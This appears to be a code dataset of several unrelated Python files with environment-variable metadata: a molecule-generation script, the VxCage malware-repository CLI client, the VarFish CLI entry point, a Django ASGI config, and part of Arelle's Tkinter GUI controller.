def cal_accuracy(S1, S2, length):
count = 0
for i in range(len(S1)):
if np.array_equal(S1[i][1:length[i]+1],S2[i][:length[i]]):
count+=1
return count
char_list= ["H","C","N","O","F","P","S","Cl","Br","I",
"n","c","o","s",
"1","2","3","4","5","6","7","8",
"(",")","[","]",
"-","=","#","/","\\","+","@","X","Y"]
char_dict={'H': 0, 'C': 1, 'N': 2, 'O': 3, 'F': 4, 'P': 5,
'S': 6, 'Cl': 7, 'Br': 8, 'I': 9,
'n': 10, 'c': 11, 'o': 12, 's': 13,
'1': 14, '2': 15, '3': 16, '4': 17, '5': 18, '6': 19, '7': 20, '8': 21,
'(': 22, ')': 23, '[': 24, ']': 25, '-': 26, '=': 27, '#': 28,
'/': 29, '\\': 30, '+': 31, '@': 32, 'X': 33, 'Y': 34}
vocab_size = len(char_list)
latent_size = 300
batch_size = 100
sample_size = 100
seq_length = 110
dev = 0.0
#input properties, [logP,SAS,TPSA]
#task_val=np.array([1.5,2,30])
if len(sys.argv)<=3:
print("python gen_CARAE_con_logP_SAS_TPSA logP SAS TPSA ")
sys.exit()
logP_set=float(sys.argv[1])
SAS_set=float(sys.argv[2])
TPSA_set=float(sys.argv[3])
task_val=np.array([logP_set,SAS_set,TPSA_set])
print(task_val)
model_name="CARAE_logP_SAS_TPSA"
save_dir="./save/"+model_name
out_dir0="out_"+model_name+"G_%d_%d_%d" %(int(logP_set*10),int(SAS_set),int(TPSA_set))
if not os.path.exists(out_dir0):
os.makedirs(out_dir0)
property_task=3
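# Scale the property targets (logP, SAS, TPSA) and their bounds by fixed normalization constants.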
task_nor=np.array([10.0,10.0,150.0])
task_low=np.array([-1.0,1.0,0.0])
task_high=np.array([5.0,8.0,150.0])
task_low=task_low/task_nor
task_high=task_high/task_nor
task_val=task_val/task_nor
Ntest=10000
num_test_batches = int(Ntest/batch_size)
model = ARAE(vocab_size = vocab_size,
batch_size = batch_size,
latent_size = latent_size,
sample_size = sample_size,
property_task = property_task
)
total_st=time.time()
epochs=[39]
for epoch in epochs:
out_dir=out_dir0+"/%d" %epoch
if not os.path.exists(out_dir):
os.makedirs(out_dir)
output_file=out_dir+"/result_"+model_name+"_%d.txt" %epoch
fp0=open(output_file,"w")
model.restore(save_dir+"/model.ckpt-%d" %epoch)
latent_vector_fake=[]
Y_fake=[]
P_fake=[]
smiles_fake=[]
for itest in range(num_test_batches):
# fp0.write('**********************************************\n')
decoder_state = model.get_decoder_state()
s = np.random.normal(0.0, 0.25, [batch_size, sample_size]).clip(-1.0,1.0)
# p = p_batches2[itest]
# cp = np.random.uniform(task_low,task_high, [batch_size, property_task])
p=np.empty([batch_size,property_task])
p[:,0].fill(task_val[0])
p[:,1].fill(task_val[1])
p[:,2].fill(task_val[2])
P_fake.append(p)
latent_vector = model.generate_latent_vector(s)
latent_vector_fake.append(latent_vector)
start_token = np.array([char_list.index('X') for i in range(batch_size)])
start_token = np.reshape(start_token, [batch_size, 1])
length = np.array([1 for i in range(batch_size)])
smiles = ['' for i in range(batch_size)]
Y=[]
for i in range(seq_length):
m, state = model.generate_molecule(start_token, latent_vector, length, p, decoder_state)
decoder_state = state
start_token = np.argmax(m,2)
Y.append(start_token[:,0])
smiles = [s + str(char_list[start_token[j][0]]) for j,s in enumerate(smiles)]
Y=list(map(list,zip(*Y)))
Y_fake.append(Y)
smiles_fake+=smiles
latent_vector_fake=np.array(latent_vector_fake,dtype="float32").reshape(-1,latent_size)
P_fake=np.array(P_fake,dtype="float32").reshape(-1,property_task)
Y_fake=np.array(Y_fake,dtype="int32").reshape(-1,seq_length)
outfile=out_dir+"/Zfake.npy"
np.save(outfile,latent_vector_fake)
outfile=out_dir+"/Pfake.npy"
np.save(outfile,P_fake)
outfile=out_dir+"/Yfake.npy"
np.save(outfile,Y_fake)
outfile=out_dir+"/smiles_fake.txt"
fp_out=open(outfile,'w')
for line in smiles_fake:
line_out=line+"\n"
fp_out.write(line_out)
fp_out.close()
total_et=time.time()
print ("total_time : ", total_et-total_st)
|
[] |
[] |
[
"CUDA_VISIBLE_DEVICES"
] |
[]
|
["CUDA_VISIBLE_DEVICES"]
|
python
| 1 | 0 | |
bin/vxcage.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import getpass
import argparse
import readline
import json
import rlcompleter
import atexit
import glob
# tab completion
def complete(text, state):
return (glob.glob(text+'*')+[None])[state]
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(complete)
# history file
histfile = os.path.join(os.environ['HOME'], '.vxcage_history')
try:
readline.read_history_file(histfile)
except IOError:
pass
atexit.register(readline.write_history_file, histfile)
del histfile, readline, rlcompleter
try:
import requests
from progressbar import *
from prettytable import PrettyTable
except ImportError as e:
sys.exit("ERROR: Missing dependency: %s" % e)
def color(text, color_code):
return '\x1b[%dm%s\x1b[0m' % (color_code, text)
def cyan(text):
return color(text, 36)
def bold(text):
return color(text, 1)
def logo():
print("")
print(cyan(" `o O o O .oOo .oOoO' .oOoO .oOo. "))
print(cyan(" O o OoO O O o o O OooO' "))
print(cyan(" o O o o o o O O o O "))
print(cyan(" `o' O O `OoO' `OoO'o `OoOo `OoO' "))
print(cyan(" O "))
print(cyan(" OoO' ") + " by nex")
print("")
def help():
print("Available commands:")
print(" " + bold("tags") + " Retrieve list of tags")
print(" " + bold("find") + " Query a file by md5, sha256, ssdeep, imphash, tag or date")
print(" " + bold("get") + " Download a file by sha256")
print(" " + bold("dump") + " Dump a list of md5, sha256, ssdeep hashes")
print(" " + bold("add") + " Upload a file to the server")
print(" " + bold("last") + " Retrieve a list of the last x files uploaded")
print(" " + bold("total") + " Total number of samples")
print(" " + bold("stats") + " File type stats")
print(" " )
print(" " + bold("version") + " Version of remote vxcage server")
print(" " + bold("license") + " Print the software license")
print(" " )
print(" " + bold("help | ?") + " Show this help")
print(" " + bold("exit | quit") + " Exit cli application")
class VxCage(object):
def __init__(self, host, port, xmock, ssl=False, auth=False):
self.host = host
self.port = port
self.ssl = ssl
self.auth = auth
self.xmock = xmock
self.username = None
self.password = None
def authenticate(self):
if self.auth:
self.username = raw_input("Username: ")
self.password = getpass.getpass("Password: ")
def build_url(self, route):
if self.ssl:
url = "https://"
if self.port is None:
self.port = 443
else:
if self.port is None:
self.port = 8080
url = "http://"
url += "%s:%s%s%s" % (self.host, self.port, self.xmock, route)
return url
def check_errors(self, code):
if code == 400:
print("ERROR: Invalid request format")
return True
elif code == 500:
print("ERROR: Unexpected error, check your server logs")
return True
else:
return False
def tags_list(self):
req = requests.get(self.build_url("/tags/list"),
auth=(self.username, self.password),
verify=False)
try:
res = req.json()
except:
try:
res = req.json
except Exception as e:
print("ERROR: Unable to parse results: {0}".format(e))
return
if self.check_errors(req.status_code):
return
table = PrettyTable(["tag"])
table.align = "l"
table.padding_width = 1
for tag in res:
table.add_row([tag])
print(table)
print("Total: %s" % len(res))
def dump_list(self, hType):
req = requests.get(self.build_url("/malware/dump/"+hType),
auth=(self.username, self.password),
verify=False)
try:
res = req.json()
except:
try:
res = req.json
except Exception as e:
print("ERROR: Unable to parse results: {0}".format(e))
return
if self.check_errors(req.status_code):
return
table = PrettyTable([hType])
table.align = "l"
table.padding_width = 1
for hType in res:
table.add_row(hType)
print(table)
print("Total: %s" % len(res))
def malware_total(self):
req = requests.get(self.build_url("/malware/total"),
auth=(self.username, self.password),
verify=False)
try:
res = req.json()
except:
try:
res = req.json
except Exception as e:
print("ERROR: Unable to parse results: {0}".format(e))
return
if self.check_errors(req.status_code):
return
print("Total: %s" % res)
def malware_stats_total(self):
req = requests.get(self.build_url("/malware/total/stats"),
auth=(self.username, self.password),
verify=False)
try:
res = req.json()
except:
try:
res = req.json
except Exception as e:
print("ERROR: Unable to parse results: {0}".format(e))
return
if self.check_errors(req.status_code):
return
self._print_list(res, ["File_type", "Count"])
def server_version(self):
req = requests.get(self.build_url("/about"),
auth=(self.username, self.password),
verify=False)
try:
res = req.json()
except:
try:
res = req.json
except Exception as e:
print("ERROR: Unable to parse results: {0}".format(e))
return
if self.check_errors(req.status_code):
return
self._print_kv(res)
def license(self):
req = requests.get(self.build_url("/about/license"),
auth=(self.username, self.password),
verify=False)
if self.check_errors(req.status_code):
return
print(req.text)
def find_malware(self, term, value):
term = term.lower()
terms = ["md5", "sha256", "ssdeep", "imphash", "tag", "date"]
if not term in terms:
print("ERROR: Invalid search term [%s]" % (", ".join(terms)))
return
payload = {term : value}
req = requests.post(self.build_url("/malware/find"),
data=payload,
auth=(self.username, self.password),
verify=False)
try:
res = req.json()
except:
try:
res = req.json
except Exception as e:
print("ERROR: Unable to parse results: {0}".format(e))
return
if req.status_code == 404:
print("No file found matching your search")
return
if self.check_errors(req.status_code):
return
self._print_malware_info(res)
def last_x(self, x):
req = requests.get(self.build_url("/malware/last/"+x),
auth=(self.username, self.password),
verify=False)
try:
res = req.json()
except:
try:
res = req.json
except Exception as e:
print("ERROR: Unable to parse results: {0}".format(e))
return
if req.status_code == 404:
print("No data found matching your search")
return
if self.check_errors(req.status_code):
return
self._print_malware_info(res)
def get_malware(self, sha256, path):
if not os.path.exists(path):
print("ERROR: Folder does not exist at path %s" % path)
return
if not os.path.isdir(path):
print("ERROR: The path specified is not a directory.")
return
req = requests.get(self.build_url("/malware/get/%s" % sha256),
auth=(self.username, self.password),
verify=False)
if req.status_code == 404:
print("File not found")
return
if self.check_errors(req.status_code):
return
size = int(req.headers["Content-Length"].strip())
bytes = 0
widgets = [
"Download: ",
Percentage(),
" ",
Bar(marker=":"),
" ",
ETA(),
" ",
FileTransferSpeed()
]
progress = ProgressBar(widgets=widgets, maxval=size).start()
destination = os.path.join(path, sha256)
binary = open(destination, "wb")
for buf in req.iter_content(1024):
if buf:
binary.write(buf)
bytes += len(buf)
progress.update(bytes)
progress.finish()
binary.close()
print("File downloaded at path: %s" % destination)
def add_malware(self, path, tags=None):
if not os.path.exists(path):
print("ERROR: File does not exist at path %s" % path)
return
files = {"file": (os.path.basename(path), open(path, "rb"))}
payload = {"tags" : tags}
req = requests.post(self.build_url("/malware/add"),
auth=(self.username, self.password),
verify=False,
files=files,
data=payload)
if not self.check_errors(req.status_code):
print("File uploaded successfully")
def _is_number(self, s):
try:
float(s)
return True
except ValueError:
return False
def _print_kv(self, res):
table = PrettyTable(["Key","Value"])
table.align = "l"
table.padding_width = 1
for k,v in res.items():
table.add_row([k, v])
print(table)
def _print_list(self, res, title = ["Key", "Value"]):
table = PrettyTable(title)
table.align = "l"
table.padding_width = 1
for v in res:
table.add_row([v[0],v[1]])
print(table)
def _print_malware_info(self, res):
if isinstance(res, dict):
for key, value in res.items():
if key == "tags":
print("%s: %s" % (bold(key), ",".join(value)))
elif key == "virustotal":
vt = res["virustotal"]
try:
print('\033[1m' + "virustotal" + '\033[0m' + ": " + str(vt["positives"]) + "/" + str(vt["total"]) + " matches")
except:
print('\033[1m' + "virustotal" + '\033[0m' + ": -/- matches")
elif key == "exif":
exif = res["exif"]
#print('\033[1m' + "timestamp" + '\033[0m' + ": " + exif["EXE:TimeStamp"])
#print('\033[1m' + "character set" + '\033[0m' + ": " + exif["EXE:CharacterSet"])
else:
print("%s: %s" % (bold(key), value))
else:
table = PrettyTable(["md5",
"sha256",
"file_name",
"file_type",
"file_size",
"virustotal",
"created_at",
"tags"])
table.align = "l"
table.padding_width = 1
for entry in res:
table.add_row([entry["md5"],
entry["sha256"],
entry["file_name"],
entry["file_type"],
entry["file_size"],
entry["virustotal"]["virustotal"],
entry["created_at"],
", ".join(entry["tags"])])
print(table)
print("Total: %d" % len(res))
def run(self):
self.authenticate()
while True:
try:
raw = raw_input(cyan("vxcage> "))
except KeyboardInterrupt:
print("")
continue
except EOFError:
print("")
break
command = raw.strip().split(" ")
if (command[0] == "help" or command[0] == "?"):
help()
elif (command[0] == "version" or command[0] == "about"):
self.server_version()
elif (command[0] == "license"):
self.license()
elif command[0] == "total":
self.malware_total()
elif command[0] == "stats":
self.malware_stats_total()
elif command[0] == "tags":
self.tags_list()
elif command[0] == "last":
if len(command) == 2 and self._is_number(command[1]):
self.last_x(command[1])
else:
print("ERROR: Missing arguments (e.g. \"last <x>\")")
elif command[0] == "dump":
if len(command) == 2 and command[1] in ['md5', 'sha256', 'ssdeep']:
self.dump_list(command[1])
else:
print("ERROR: Missing arguments (e.g. \"dump <type>\")")
print(" Available types: md5, sha256, ssdeep")
elif command[0] == "find":
if len(command) == 3 and command[1] in ['md5', 'sha256', 'ssdeep', 'imphash', 'tag', 'date']:
self.find_malware(command[1], command[2])
else:
print("ERROR: Missing arguments (e.g. \"find <key> <value>\")")
print(" Available keys: md5, sha256, ssdeep, imphash, tag or date")
elif command[0] == "get":
if len(command) == 3:
self.get_malware(command[1], command[2])
else:
print("ERROR: Missing arguments (e.g. \"get <sha256> <path>\")")
elif command[0] == "add":
if len(command) == 2:
self.add_malware(command[1])
elif len(command) == 3:
self.add_malware(command[1], command[2])
else:
print("ERROR: Missing arguments (e.g. \"add <path> <comma separated tags>\")")
elif (command[0] == "quit" or command[0] == "exit"):
break
if __name__ == "__main__":
logo()
parser = argparse.ArgumentParser()
parser.add_argument("-H", "--host", help="Host of VxCage server", default="localhost", action="store", required=False)
parser.add_argument("-p", "--port", help="Port of VxCage server", action="store", required=False)
parser.add_argument("-s", "--ssl", help="Enable if the server is running over SSL", default=False, action="store_true", required=False)
parser.add_argument("-a", "--auth", help="Enable if the server is prompting an HTTP authentication", default=False, action="store_true", required=False)
parser.add_argument("-x", "--xmock", help="(api testing) URL of VxCage server mock service", default="", action="store", required=False)
args = parser.parse_args()
vx = VxCage(host=args.host, port=args.port, ssl=args.ssl, auth=args.auth, xmock=args.xmock)
vx.run()
|
[] |
[] |
[
"HOME"
] |
[]
|
["HOME"]
|
python
| 1 | 0 | |
varfish_cli/__main__.py
|
"""Main entry point for VarFish CLI."""
import argparse
import logging
import os
import sys
import logzero
import toml
from logzero import logger
from varfish_cli import __version__
from .common import run_nocmd, CommonConfig
from .case import setup_argparse as setup_argparse_case
from .case import run as run_case
#: Paths to search the global configuration in.
GLOBAL_CONFIG_PATHS = ("~/.varfishrc.toml",)
def setup_argparse_only(): # pragma: nocover
"""Wrapper for ``setup_argparse()`` that only returns the parser.
Only used in sphinx documentation via ``sphinx-argparse``.
"""
return setup_argparse()[0]
def setup_argparse():
"""Create argument parser."""
# Construct argument parser and set global options.
parser = argparse.ArgumentParser(prog="varfish-cli")
parser.add_argument("--verbose", action="store_true", default=False, help="Increase verbosity.")
parser.add_argument("--version", action="version", version="%%(prog)s %s" % __version__)
group = parser.add_argument_group("Basic Configuration")
group.add_argument(
"--no-verify-ssl",
dest="verify_ssl",
default=True,
action="store_false",
help="Disable HTTPS SSL verification",
)
group.add_argument(
"--config",
default=os.environ.get("VARFISH_CONFIG_PATH", None),
help="Path to configuration file.",
)
group.add_argument(
"--varfish-server-url",
default=os.environ.get("VARFISH_SERVER_URL", None),
help="VarFish server URL key to use, defaults to env VARFISH_SERVER_URL.",
)
group.add_argument(
"--varfish-api-token",
default=os.environ.get("VARFISH_API_TOKEN", None),
help="VarFish API token to use, defaults to env VARFISH_API_TOKEN.",
)
# Add sub parsers for each argument.
subparsers = parser.add_subparsers(dest="cmd")
setup_argparse_case(subparsers.add_parser("case", help="Work with cases."))
return parser, subparsers
def main(argv=None):
"""Main entry point before parsing command line arguments."""
# Setup command line parser.
parser, subparsers = setup_argparse()
# Actually parse command line arguments.
args = parser.parse_args(argv)
# Setup logging incl. verbosity.
if args.verbose: # pragma: no cover
level = logging.DEBUG
else:
# Remove module name and line number if not running in debug mode.
formatter = logzero.LogFormatter(
fmt="%(color)s[%(levelname)1.1s %(asctime)s]%(end_color)s %(message)s"
)
logzero.formatter(formatter)
level = logging.INFO
logzero.loglevel(level=level)
# Load configuration, if any.
if args.config:
config_paths = (args.config,)
else:
config_paths = GLOBAL_CONFIG_PATHS
for config_path in config_paths:
config_path = os.path.expanduser(os.path.expandvars(config_path))
if os.path.exists(config_path):
with open(config_path, "rt") as tomlf:
toml_config = toml.load(tomlf)
break
else:
toml_config = None
logger.info("Could not find any of the global configuration files %s.", config_paths)
# Merge configuration from command line/environment args and configuration file.
config = CommonConfig.create(args, toml_config)
# Handle the actual command line.
cmds = {None: run_nocmd, "case": run_case}
res = cmds[args.cmd](
config, toml_config, args, parser, subparsers.choices[args.cmd] if args.cmd else None
)
if not res:
logger.info("All done. Have a nice day!")
else: # pragma: nocover
logger.error("Something did not work out correctly.")
return res
if __name__ == "__main__": # pragma: no cover
sys.exit(main(sys.argv))
|
[] |
[] |
[
"VARFISH_API_TOKEN",
"VARFISH_SERVER_URL",
"VARFISH_CONFIG_PATH"
] |
[]
|
["VARFISH_API_TOKEN", "VARFISH_SERVER_URL", "VARFISH_CONFIG_PATH"]
|
python
| 3 | 0 | |
cloak/asgi.py
|
"""
ASGI config for cloak project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'cloak.settings')
application = get_asgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
arelle/CntlrWinMain.py
|
'''
Created on Oct 3, 2010
This module is Arelle's controller in windowing interactive UI mode
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
from arelle import PythonUtil # define 2.x or 3.x string types
import os, sys, subprocess, pickle, time, locale, re
from tkinter import (Tk, TclError, Toplevel, Menu, PhotoImage, StringVar, BooleanVar, N, S, E, W, EW,
HORIZONTAL, VERTICAL, END, font as tkFont)
try:
from tkinter.ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
except ImportError: # 3.0 versions of tkinter
from ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
import tkinter.tix
import tkinter.filedialog
import tkinter.messagebox, traceback
from arelle.Locale import format_string
from arelle.CntlrWinTooltip import ToolTip
from arelle import XbrlConst
from arelle.PluginManager import pluginClassMethods
from arelle.UrlUtil import isHttpUrl
import logging
import threading, queue
from arelle import Cntlr
from arelle import (DialogURL, DialogLanguage,
DialogPluginManager, DialogPackageManager,
ModelDocument,
ModelManager,
PackageManager,
RenderingEvaluator,
TableStructure,
ViewWinDTS,
ViewWinProperties, ViewWinConcepts, ViewWinRelationshipSet, ViewWinFormulae,
ViewWinFactList, ViewWinFactTable, ViewWinRenderedGrid, ViewWinXml,
ViewWinRoleTypes, ViewFileRoleTypes, ViewFileConcepts,
ViewWinTests, ViewWinTree, ViewWinVersReport, ViewWinRssFeed,
ViewFileTests,
ViewFileRenderedGrid,
ViewFileRelationshipSet,
Updater
)
from arelle.ModelFormulaObject import FormulaOptions
from arelle.FileSource import openFileSource
restartMain = True
class CntlrWinMain (Cntlr.Cntlr):
def __init__(self, parent):
super(CntlrWinMain, self).__init__(hasGui=True)
self.parent = parent
self.filename = None
self.dirty = False
overrideLang = self.config.get("labelLangOverride")
self.labelLang = overrideLang if overrideLang else self.modelManager.defaultLang
self.data = {}
if self.isMac: # Mac Python fonts render larger than in other apps (Terminal, TextEdit, Word) and than Arelle on Windows
_defaultFont = tkFont.nametofont("TkDefaultFont") # label, status bar, treegrid
_defaultFont.configure(size=11)
_textFont = tkFont.nametofont("TkTextFont") # entry widget and combobox entry field
_textFont.configure(size=11)
#parent.option_add("*Font", _defaultFont) # would be needed if not using defaulted font
toolbarButtonPadding = 1
else:
toolbarButtonPadding = 4
tkinter.CallWrapper = TkinterCallWrapper
imgpath = self.imagesDir + os.sep
if self.isMSW:
icon = imgpath + "arelle.ico"
parent.iconbitmap(icon, default=icon)
#image = PhotoImage(file=path + "arelle32.gif")
#label = Label(None, image=image)
#parent.iconwindow(label)
else:
parent.iconbitmap("@" + imgpath + "arelle.xbm")
# try with gif file
#parent.iconbitmap(path + "arelle.gif")
self.menubar = Menu(self.parent)
self.parent["menu"] = self.menubar
self.fileMenu = Menu(self.menubar, tearoff=0)
self.fileMenuLength = 1
for label, command, shortcut_text, shortcut in (
#(_("New..."), self.fileNew, "Ctrl+N", "<Control-n>"),
(_("Open File..."), self.fileOpen, "Ctrl+O", "<Control-o>"),
(_("Open Web..."), self.webOpen, "Shift+Alt+O", "<Shift-Alt-o>"),
(_("Import File..."), self.importFileOpen, None, None),
(_("Import Web..."), self.importWebOpen, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Open", None, None),
(_("Save..."), self.fileSave, "Ctrl+S", "<Control-s>"),
(_("Save DTS Package"), self.saveDTSpackage, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Save", None, None),
(_("Close"), self.fileClose, "Ctrl+W", "<Control-w>"),
(None, None, None, None),
(_("Quit"), self.quit, "Ctrl+Q", "<Control-q>"),
#(_("Restart"), self.restart, None, None),
(None, None, None, None),
("",None,None,None) # position for file history
):
if label is None:
self.fileMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, self.fileMenu)
self.fileMenuLength += 1
else:
self.fileMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
self.parent.bind(shortcut, command)
self.fileMenuLength += 1
self.loadFileMenuHistory()
self.menubar.add_cascade(label=_("File"), menu=self.fileMenu, underline=0)
toolsMenu = Menu(self.menubar, tearoff=0)
validateMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Validation"), menu=validateMenu, underline=0)
validateMenu.add_command(label=_("Validate"), underline=0, command=self.validate)
self.modelManager.validateDisclosureSystem = self.config.setdefault("validateDisclosureSystem",False)
self.validateDisclosureSystem = BooleanVar(value=self.modelManager.validateDisclosureSystem)
self.validateDisclosureSystem.trace("w", self.setValidateDisclosureSystem)
validateMenu.add_checkbutton(label=_("Disclosure system checks"), underline=0, variable=self.validateDisclosureSystem, onvalue=True, offvalue=False)
validateMenu.add_command(label=_("Select disclosure system..."), underline=0, command=self.selectDisclosureSystem)
self.modelManager.validateCalcLB = self.config.setdefault("validateCalcLB",False)
self.validateCalcLB = BooleanVar(value=self.modelManager.validateCalcLB)
self.validateCalcLB.trace("w", self.setValidateCalcLB)
validateMenu.add_checkbutton(label=_("Calc Linkbase checks"), underline=0, variable=self.validateCalcLB, onvalue=True, offvalue=False)
self.modelManager.validateInferDecimals = self.config.setdefault("validateInferDecimals",False)
self.validateInferDecimals = BooleanVar(value=self.modelManager.validateInferDecimals)
self.validateInferDecimals.trace("w", self.setValidateInferDecimals)
validateMenu.add_checkbutton(label=_("Infer Decimals in calculations"), underline=0, variable=self.validateInferDecimals, onvalue=True, offvalue=False)
self.modelManager.validateUtr = self.config.setdefault("validateUtr",True)
self.validateUtr = BooleanVar(value=self.modelManager.validateUtr)
self.validateUtr.trace("w", self.setValidateUtr)
validateMenu.add_checkbutton(label=_("Unit Type Registry validation"), underline=0, variable=self.validateUtr, onvalue=True, offvalue=False)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Validation"):
pluginMenuExtender(self, validateMenu)
formulaMenu = Menu(self.menubar, tearoff=0)
formulaMenu.add_command(label=_("Parameters..."), underline=0, command=self.formulaParametersDialog)
toolsMenu.add_cascade(label=_("Formula"), menu=formulaMenu, underline=0)
self.modelManager.formulaOptions = FormulaOptions(self.config.get("formulaParameters"))
toolsMenu.add_command(label=_("Compare DTSes..."), underline=0, command=self.compareDTSes)
cacheMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu.add_command(label=_("Options..."), underline=0, command=self.rssWatchOptionsDialog)
rssWatchMenu.add_command(label=_("Start"), underline=0, command=lambda: self.rssWatchControl(start=True))
rssWatchMenu.add_command(label=_("Stop"), underline=0, command=lambda: self.rssWatchControl(stop=True))
toolsMenu.add_cascade(label=_("RSS Watch"), menu=rssWatchMenu, underline=0)
self.modelManager.rssWatchOptions = self.config.setdefault("rssWatchOptions", {})
toolsMenu.add_cascade(label=_("Internet"), menu=cacheMenu, underline=0)
self.webCache.workOffline = self.config.setdefault("workOffline",False)
self.workOffline = BooleanVar(value=self.webCache.workOffline)
self.workOffline.trace("w", self.setWorkOffline)
cacheMenu.add_checkbutton(label=_("Work offline"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
'''
self.webCache.recheck = self.config.setdefault("webRecheck",False)
self.webRecheck = BooleanVar(value=self.webCache.webRecheck)
self.webRecheck.trace("w", self.setWebRecheck)
cacheMenu.add_checkbutton(label=_("Recheck file dates weekly"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
self.webCache.notify = self.config.setdefault("",False)
self.downloadNotify = BooleanVar(value=self.webCache.retrievalNotify)
self.downloadNotify.trace("w", self.setRetrievalNotify)
cacheMenu.add_checkbutton(label=_("Notify file downloads"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
'''
cacheMenu.add_command(label=_("Clear cache"), underline=0, command=self.confirmClearWebCache)
cacheMenu.add_command(label=_("Manage cache"), underline=0, command=self.manageWebCache)
cacheMenu.add_command(label=_("Proxy Server"), underline=0, command=self.setupProxy)
logmsgMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Messages log"), menu=logmsgMenu, underline=0)
logmsgMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logmsgMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
self.modelManager.collectProfileStats = self.config.setdefault("collectProfileStats",False)
self.collectProfileStats = BooleanVar(value=self.modelManager.collectProfileStats)
self.collectProfileStats.trace("w", self.setCollectProfileStats)
logmsgMenu.add_checkbutton(label=_("Collect profile stats"), underline=0, variable=self.collectProfileStats, onvalue=True, offvalue=False)
logmsgMenu.add_command(label=_("Log profile stats"), underline=0, command=self.showProfileStats)
logmsgMenu.add_command(label=_("Clear profile stats"), underline=0, command=self.clearProfileStats)
toolsMenu.add_command(label=_("Language..."), underline=0, command=lambda: DialogLanguage.askLanguage(self))
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Tools"):
pluginMenuExtender(self, toolsMenu)
self.menubar.add_cascade(label=_("Tools"), menu=toolsMenu, underline=0)
helpMenu = Menu(self.menubar, tearoff=0)
for label, command, shortcut_text, shortcut in (
(_("Check for updates"), lambda: Updater.checkForUpdates(self), None, None),
(_("Manage plug-ins"), lambda: DialogPluginManager.dialogPluginManager(self), None, None),
(_("Manage packages"), lambda: DialogPackageManager.dialogPackageManager(self), None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Upper", None, None),
(None, None, None, None),
(_("About..."), self.helpAbout, None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Lower", None, None),
):
if label is None:
helpMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, helpMenu)
else:
helpMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
self.parent.bind(shortcut, command)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Help"):
pluginMenuExtender(self, toolsMenu)
self.menubar.add_cascade(label=_("Help"), menu=helpMenu, underline=0)
windowFrame = Frame(self.parent)
self.statusbar = Label(windowFrame, text=_("Ready..."), anchor=W)
self.statusbarTimerId = self.statusbar.after(5000, self.uiClearStatusTimerEvent)
self.statusbar.grid(row=2, column=0, columnspan=2, sticky=EW)
#self.balloon = tkinter.tix.Balloon(windowFrame, statusbar=self.statusbar)
self.toolbar_images = []
toolbar = Frame(windowFrame)
menubarColumn = 0
self.validateTooltipText = StringVar()
for image, command, toolTip, statusMsg in (
#("images/toolbarNewFile.gif", self.fileNew),
("toolbarOpenFile.gif", self.fileOpen, _("Open local file"), _("Open by choosing a local XBRL file, testcase, or archive file")),
("toolbarOpenWeb.gif", self.webOpen, _("Open web file"), _("Enter an http:// URL of an XBRL file or testcase")),
("toolbarSaveFile.gif", self.fileSave, _("Save file"), _("Saves currently selected local XBRL file")),
("toolbarClose.gif", self.fileClose, _("Close"), _("Closes currently selected instance/DTS or testcase(s)")),
(None,None,None,None),
("toolbarFindMenu.gif", self.find, _("Find"), _("Find dialog for scope and method of searching")),
(None,None,None,None),
("toolbarValidate.gif", self.validate, self.validateTooltipText, _("Validate currently selected DTS or testcase(s)")),
("toolbarCompare.gif", self.compareDTSes, _("Compare DTSes"), _("compare two DTSes")),
(None,None,None,None),
("toolbarLogClear.gif", self.logClear, _("Messages Log | Clear"), _("Clears the messages log")),
#(Combobox(toolbar, textvariable=self.findVar, values=self.findValues,
# ), self.logClear, _("Find options"), _("Select of find options")),
):
if command is None:
tbControl = Separator(toolbar, orient=VERTICAL)
tbControl.grid(row=0, column=menubarColumn, padx=6)
elif isinstance(image, Combobox):
tbControl = image
tbControl.grid(row=0, column=menubarColumn)
else:
image = os.path.join(self.imagesDir, image)
try:
image = PhotoImage(file=image)
self.toolbar_images.append(image)
tbControl = Button(toolbar, image=image, command=command, style="Toolbutton", padding=toolbarButtonPadding)
tbControl.grid(row=0, column=menubarColumn)
except TclError as err:
print(err)
if isinstance(toolTip,StringVar):
ToolTip(tbControl, textvariable=toolTip, wraplength=240)
else:
ToolTip(tbControl, text=toolTip)
menubarColumn += 1
for toolbarExtender in pluginClassMethods("CntlrWinMain.Toolbar"):
toolbarExtender(self, toolbar)
toolbar.grid(row=0, column=0, sticky=(N, W))
paneWinTopBtm = PanedWindow(windowFrame, orient=VERTICAL)
paneWinTopBtm.grid(row=1, column=0, sticky=(N, S, E, W))
paneWinLeftRt = tkinter.PanedWindow(paneWinTopBtm, orient=HORIZONTAL)
paneWinLeftRt.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
